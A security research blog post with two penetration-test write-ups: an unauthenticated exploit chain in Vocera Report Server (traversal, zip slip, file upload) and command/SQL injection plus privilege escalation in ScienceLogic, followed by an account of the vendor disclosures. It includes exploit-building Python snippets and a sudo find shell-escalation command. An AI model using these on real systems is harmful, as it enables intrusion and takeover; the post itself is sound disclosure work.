Vocera Report Server Pwnage
This article is in no way affiliated, sponsored, or endorsed with/by Vocera Communications or Stryker Corporation. All graphics are being displayed under fair use for the purposes of this article.
Quest for RCE
Last year during a routine penetration test, our team came across an interesting target called Vocera Report Server while reviewing web endpoint screenshots.
A little research revealed that the “Vocera Report Server software and the associated report console interface provide administrators, managers, and decision makers the ability to monitor system performance and generate reports for analysis” for the Vocera Communication System. When we click on the “Vocera Report Console” link we are greeted with the following login page.
Step 1: head over to Google to see if we can find any documentation that might list default credentials for the application. As luck would have it, this page comes up and kindly tells us what the default password would be.
Fortunately the system owner didn’t change the password and we log right in. Once inside we start perusing the various endpoints to get a feel for what the application is used for. Right off, the first thing that stands out is the menu that is named “Task Scheduler”. Clicking on the menu brings up a panel that appears to let you create tasks that will be executed.
After tinkering with the various tasks, it appears we can only edit existing tasks. We also can’t seem to get arbitrary command execution or injection by modifying the existing entries. At this point we decided it would likely be more fruitful to move on to a white box approach and see what the code is actually doing. We reached out to a colleague to get us access to the server using some credentials they had cracked after pulling the hash with Responder.
Since the application is written in Java, we open the class files in JD-GUI to begin analyzing the function responsible for executing tasks. The first issue we notice is that the function parsing the user-controlled task execFileName attempts to retrieve the filename portion of the path by searching for the last occurrence of a backslash. Unfortunately, Java on Windows also treats forward slashes as directory separators, so a path built with forward slashes passes through that check untouched. This means we can traverse out of the intended directory.
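The flawed extraction can be sketched in a few lines (a reconstruction of the general logic in Python, not the vendor's exact code):

```python
def extract_filename(exec_file_name: str) -> str:
    # Strips everything up to the last backslash -- but never considers
    # forward slashes, which the JVM also honors as separators on Windows.
    return exec_file_name[exec_file_name.rfind("\\") + 1:]

# A backslash path is reduced to its basename as intended...
assert extract_filename(r"C:\tasks\report.bat") == "report.bat"
# ...but a forward-slash traversal string survives intact, and the
# filesystem layer later resolves it as a relative path.
assert extract_filename("../../logs/task.log") == "../../logs/task.log"
```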
While the path to the executable task is controllable, a check is performed that ensures that the file contains the word “java” before executing. This means if we can control the contents of a file on disk, we can execute arbitrary commands.
How then do we get a file on disk that we control? What if we can affect the log file? It looks like if an exception happens when executing the task, a log entry is created.
Sure enough, if we specify a task execFileName that doesn’t exist, an entry is created in the log file that also includes the task parameters, into which we can inject arbitrary data. With a little creativity, we are able to inject arbitrary commands and then point to the log file using the directory traversal to achieve remote code execution.
Can we do better?
With a path to execute arbitrary commands identified, we shifted our focus to finding a way to accomplish the same thing but without having to authenticate first. While investigating the task execution code in the previous exercise, we noticed there is a websocket interface that the web server communicates with when executing a task. After some testing it was determined that this interface was unauthenticated. In addition to the “runTaskPage” function mentioned above, there are a few other operations that appear to be related to database management functions that are worth investigating.
If we look at the code for the restoreSqlData operation we see that it executes a bat file that in turn executes another Java JAR. Inside that JAR, the function that handles the restoreSqlData operation parses the “uploadFile” parameter and appends it to the local “backupDir”. This instance is also vulnerable to directory traversal like the one mentioned previously.
The specified file is expected to be a zip file that is then programmatically unzipped and written to disk. The problem, as you could probably guess, is the unzip function is vulnerable to directory traversal which could lead to an arbitrary file write. If the unzip succeeds, a particular file is read from the archive that is then used to completely overwrite the database. DANGER: THIS OPERATION OVERWRITES THE DATABASE SO ADDITIONAL MEASURES NEED TO BE TAKEN TO PREVENT THIS.
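The "zip slip" pattern behind that arbitrary file write is easy to demonstrate. The function below mirrors the vulnerable extraction logic (a sketch, not the actual product code): entry names are joined onto the destination without any normalization, so a `../` entry escapes the intended directory.

```python
import io
import os
import tempfile
import zipfile

def naive_unzip(zip_bytes: bytes, dest: str) -> None:
    """Vulnerable extraction: entry names are trusted verbatim."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            out_path = os.path.join(dest, info.filename)  # no traversal check!
            os.makedirs(os.path.dirname(out_path), exist_ok=True)
            with open(out_path, "wb") as f:
                f.write(zf.read(info))

# Build an archive containing a traversal entry.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("../escaped.txt", "written outside dest")

root = tempfile.mkdtemp()
dest = os.path.join(root, "backup")
os.makedirs(dest)
naive_unzip(buf.getvalue(), dest)
# The file landed one level above the intended destination.
print(os.path.exists(os.path.join(root, "escaped.txt")))  # True
```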
Since this server hosts a web server and is running as SYSTEM, an arbitrary file write can be used to achieve remote code execution by writing a webshell in the webroot. To summarize, in this instance we have found an unauthenticated endpoint that allows for a privileged file write if we can place an arbitrary file somewhere on the file system. We lack one more primitive to pull off this exploit. Back to the code!
Given the specific requirement for a file write, we search for any references to “write” and work our way back to any web endpoints that reach that code. This concept is often referred to as source-to-sink data flow analysis. After some time we find a class called MultipartRequest. This class is instantiated from an incoming multipart/form-data request. If the request contains any parameters that include a filename, the data is read and written to a file in a temp folder.
If we search for references to RequestContainer, the class responsible for creating MultipartRequest instances, we see it is created by the BaseController class on the handling of each HTTP request. Since BaseController is an abstract class, we search for any child classes and find ReportController. This is perfect since ReportController is the primary endpoint for the application. This means if we send an HTTP request with Content-Type multipart/form-data to the ReportController endpoint, the contents of any parameters with a Content-Disposition that contains a filename will be written to disk in a temp directory. The best part is this is all unauthenticated (another bug)!
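Such a request can be assembled with only the standard library. A minimal sketch follows; `target_host` and `report_path` in the trailing comment are placeholders, since we are not reproducing the product's real paths here:

```python
import uuid

def build_multipart(field: str, filename: str, payload: bytes):
    """Build a multipart/form-data body whose single part carries a
    filename in its Content-Disposition header -- the trigger for the
    server-side temp-file write."""
    boundary = uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; '
        f'filename="{filename}"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + payload + tail

content_type, body = build_multipart("report", "payload.zip", b"PK\x03\x04...")
# POSTing this to the ReportController endpoint drops payload.zip into
# the server's temp directory, e.g. with http.client:
#   conn = http.client.HTTPSConnection(target_host)
#   conn.request("POST", report_path, body, {"Content-Type": content_type})
```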
Now we have all the pieces necessary to construct an exploit chain to gain unauthenticated remote code execution on the Vocera Report Server. First we construct a malicious zip file with a webshell embedded with a directory traversal path. Next we upload a zip file to the temp directory with a multipart request. Finally we send a websocket request with the restoreSqlData operation with a directory traversal path to our uploaded zip file.
WAIT!!! HOW DO I NOT CLOBBER THE DATABASE?!?!
As much as any customer likes red teamers proving exploitation, nuking an application’s database is not a reasonable price to pay to prove code execution. That meant we needed to put a little more effort into the exploit to avoid it. If we look at the SQL restore function, we can see that if a ZipException is thrown (that is not a version issue), the function will bail out.
How then do we cause a ZipException while also successfully executing our arbitrary file write? If we look at the JDK source code for ZipInputStream we can see a simple way to cause a ZipException to be thrown from a specific ZipEntry. If we set the first bit of the flag field in the ZipEntry, a ZipException will be thrown since encryption is not supported.
If we look up the offset for LOCFLG we see it is at index 6 in the ZipEntry local header. We can write some Python to modify the zip entry contents after we zip up our payload, as shown below.
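Since the local file header layout is fixed (4-byte signature, 2-byte version, then the 2-byte general-purpose flag at offset 6), a small script can set the "encrypted" bit on a chosen entry after the archive is built. A minimal sketch, with illustrative entry names:

```python
import io
import zipfile

def set_encryption_flag(zip_bytes: bytes, entry_name: bytes) -> bytes:
    """Set bit 0 of the general-purpose flag (LOCFLG, offset 6) in the
    local file header for entry_name. ZipInputStream reads local headers
    sequentially and throws a ZipException on the flagged entry because
    it does not support encrypted entries."""
    data = bytearray(zip_bytes)
    sig = b"PK\x03\x04"  # local file header signature
    pos = data.find(sig)
    while pos != -1:
        # name length lives at offset 26; the name itself at offset 30
        name_len = int.from_bytes(data[pos + 26:pos + 28], "little")
        if bytes(data[pos + 30:pos + 30 + name_len]) == entry_name:
            data[pos + 6] |= 0x01  # mark the entry as "encrypted"
            return bytes(data)
        pos = data.find(sig, pos + 4)
    raise ValueError("entry not found")

# Build a zip whose first entry extracts normally and whose second,
# flagged entry aborts the restore before the database is overwritten.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("shell.jsp", "<%-- payload --%>")
    zf.writestr("dbdump.sql", "never restored")
patched = set_encryption_flag(buf.getvalue(), b"dbdump.sql")
```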
Vendor Disclosure & Patch
I reported these issues through the Stryker vulnerability disclosure program and can say everything went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Vocera Report Server deployed to update to the latest version immediately. For tracking purposes, the vulnerabilities discussed here represent CVE-2022-46898, CVE-2022-46899, CVE-2022-46900, CVE-2022-46901, and CVE-2022-46902.
ScienceLogic Dumpster Fire
This article is in no way affiliated, sponsored, or endorsed with/by ScienceLogic, Inc. All graphics are being displayed under fair use for the purposes of this article.
Just another Day
During a penetration test for a client last year, our team identified a noteworthy target that piqued our interest. A screenshot of the website appeared in our scan findings.
After a brief investigation, we found a page that provided a clear overview of the web application’s potential function and its default credentials.
The default credentials for the phpMyAdmin server on port 8008 were also provided. This detail becomes crucial later, as it grants the ability to directly modify records within the application database.
Regrettably, the system owner had not updated the default passwords, allowing us to access the system. Immediately noticeable was a menu named “Device Toolbox.” We started examining the parameters provided to these tools, as they frequently have command injection vulnerabilities due to inadequate input filtering.
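The vulnerable pattern is easy to sketch (a reconstruction of the general flaw in Python, not ScienceLogic's actual PHP): user input flows into a shell string unsanitized, so shell metacharacters break out of the intended command.

```python
import subprocess

def run_tool(target: str) -> str:
    # Vulnerable pattern: the user-supplied target is interpolated
    # straight into a shell command line.
    cmd = f"echo scanning {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# A benign value behaves as expected...
assert run_tool("10.0.0.1") == "scanning 10.0.0.1\n"
# ...but a semicolon terminates the command and runs an attacker's own.
assert "injected" in run_tool("10.0.0.1; echo injected")
```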
After trying different payloads in the request fields, the following screen appeared as we navigated through the tool wizard.
Having demonstrated command execution, we swapped the payload for a reverse shell callback and launched it. This granted us shell access to the server. Considering the simplicity of uncovering this initial command injection vulnerability, we believed there might be more similar flaws. Now, with system access, we can observe process creation events using one of our preferred tools, Pspy. As expected, four additional command injection vulnerabilities were identified by exercising various endpoints in the web application and monitoring process creation events in Pspy. An example is illustrated below.
Having access to the file system, we proceeded to examine the web application’s source code. This would make identifying vulnerabilities simpler than through blackbox testing. However, when we tried to view the PHP files, they seemed to be indecipherable.
What about root?
Given our inability to read the web application’s source code, we shifted our focus towards pinpointing potential paths for privilege escalation to root. We uploaded and ran LinPEAS on the system to identify any potential privilege escalation vulnerabilities. While LinPEAS didn’t reveal anything of particular use, a copy of the sudoers file was located in one of the backup folders on the file system. It listed several applications that could be executed as root, without a password, that have known privilege escalation capabilities.
The find command is one of my go-tos after running across this article years ago. Running the following command executes the listed program as root on the system.
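A sketch of the well-known find escalation (the sudo line is commented out so the snippet stays harmless; it assumes find appears in sudoers with NOPASSWD):

```shell
# find's -exec runs its argument with find's own privileges, and -quit
# stops after the first match so only one shell is spawned:
#
#   sudo find . -maxdepth 0 -exec /bin/sh -p \; -quit
#
# The same -exec mechanic, demonstrated with a harmless command:
find . -maxdepth 0 -exec echo "this command runs with find's privileges" \; -quit
```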
Having gained root privileges, we could now revisit the web application and hopefully find a way to review the source code for vulnerabilities.
Let’s briefly diverge to discuss the DMCA and the laws surrounding the circumvention of copyright protections. I bring this up because even basic encoding or encryption of source code might be viewed as a method to safeguard copyright, which could potentially hinder security researchers from examining that source code for vulnerabilities. Fortunately, the rules in Title 37 of the CFR were recently updated to grant security researchers an exemption when operating under the auspices of good-faith security research. Given that we are red teamers performing good-faith security research, securing our customers against critical vulnerabilities, we clearly fall under this exemption.
We took a look at the PHP configuration and noticed a custom module was being used to load each source file. Analyzing the module in IDA Pro, it appears to be a simple function that decrypts the file with a static AES 256 key and then decompresses the output with zlib. Nothing fancy here.
Running this algorithm against the garbled source does the trick and we end up with normal looking PHP.
Beware what’s inside!!!
With access to the source code, we started scrutinizing it for more serious vulnerabilities. We had previously observed a command injection bug where the command was saved in the database and subsequently fetched and executed. This prompted us to search for potential SQL injection vulnerabilities, which might be escalated to remote code execution. As we examined the application endpoints, we discovered what seemed like systematic SQL injection issues. After pinpointing roughly 20 SQL injection vulnerabilities, we chose to conclude our search. A few examples are provided below.
Having identified a combined 25 command injection and SQL injection vulnerabilities we decided to stop bug hunting and reach out to the vendor to begin the disclosure process.
Vendor Disclosure & Patch
We’d love to say responsibly disclosing the vulnerabilities we discovered went smoothly, but it was easily the worst experience we’ve had. What follows is presented as a comical checklist of signs that responsible disclosure is probably going to go badly. In reality, all of these things happened during this one disclosure.
The vendor has no public vulnerability disclosure policy
The vendor has no security related email contacts listed on their website
The vendor Twitter account refuses to give you a security contact after you explain you want to disclose a security vulnerability.
After spamming vendor emails harvested from OSINT, the only response you get is from a random engineer. Fortunately, he forwards the email to the security director.
The security director refuses to accept your report, and instead points you to a portal to submit a ticket.
After signing up for the ticketing portal, you find that you can’t submit a ticket unless you are a customer.
When you notify the company that you can’t submit a ticket unless you are a customer, they tell you to have your customer submit the report.
When you send the report anyway, encrypted and hosted on a trusted website, they refuse to open it because they claim it could be a phish.
Individuals from the vendor reach out to arbitrary contacts in your customer’s organization to report you for unusual, possibly malicious behavior.
Upon verification of your identity by multiple individuals in your customer’s organization, they agree to open the results but go silent for weeks.
You receive an email from @zerodaylaw (no seriously) saying they will be representing the vendor going forward in the disclosure process.
The law firm has no technical questions about the vulnerabilities themselves, but instead about behavior surrounding post-exploitation and why this software was “targeted”.
After multiple unanswered follow-up emails to both the law firm and the vendor about coordinating with @MITREcorp to get CVEs reserved, you get an email asking to meet in person, that very week.
In the follow-up phone call (after declining to meet in person), the vendor claims most of the bugs were “features” or in “dead code”.
The primary focus of the call with the vendor is how we “got” the company’s code, not the vulnerability details.
The vendor claims that meeting the 90-day public disclosure deadline is unlikely, and given their customer base they have no estimate on when public disclosure could happen.
After the phone call, the vendor sends an email asking questions focused on exact times, people, authorizations, and details surrounding the vulnerability coordination with @MITREcorp.
Lawyers from the vendor contact your customer’s organization requesting copies of all correspondence with @MITREcorp.